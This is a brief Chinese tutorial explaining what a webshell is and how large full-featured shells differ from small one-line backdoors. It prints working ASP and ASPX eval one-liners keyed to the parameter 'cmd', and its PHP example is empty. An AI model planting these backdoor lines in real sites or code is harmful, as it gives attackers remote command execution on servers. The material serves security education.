1 WebShell概述2 大马与小马3 总结
1 WebShell概述- 简答理解:通过Web漏洞获得网站后门,就是WebShell。Shell概念:在计算机科学中,Shell俗称壳,是指“为使用者提供操作界面”的软件(命令解释器),类似于Windows系统的cmd.exe或者Linux下的bash等。WebShell:
- 概念:WebShell是一个网站的后门,也是一个命令解释器,与其他Shell不同是的,这是以Web的方式(Http协议)进行通信(传递命令信息)的、继承了Web用户的权限的Shell。本质:是服务器端可执行的脚本文件,根据其服务器类型不同,通常为.php/ .asp/ .aspx/ .jsp等格式。(根据其代码量或功能大小,常分为大马与小马两种。)工作方式:接受来自Web用户的命令,然后在服务器端执行。
- 当将其理解为动词时,表示获取网站或系统后门的过程;当将其理解为名称时,表示完成后门布置的目标或结果。
- WebShell可以是大马也可以是小马。大马特点:
- 代码比较多,功能比较丰富;不同版本大马之间脚本格式繁多,但总体功能基本相同。(常可以进行文件管理、执行系统命令、还有一些定制功能)各团队常有自己的定制大马。
- 短小精悍,常为一句话木马;常配合中国菜刀或中国蚁剑等客户端一起使用,以达到实现文件管理、虚拟终端、数据库管理的目的。常见不同语言下的一句话木马:如下访问时密码为cmd
//…….asp
<%eval request("cmd")%>
//…….aspx
<%@ Page Language="Jscript"%>
<%eval(Request.Item["cmd"],"unsafe")>
//…….php
3 总结
- 简单WebShell的本质;了解大马与小马的特点;了解常见的一句话木马。
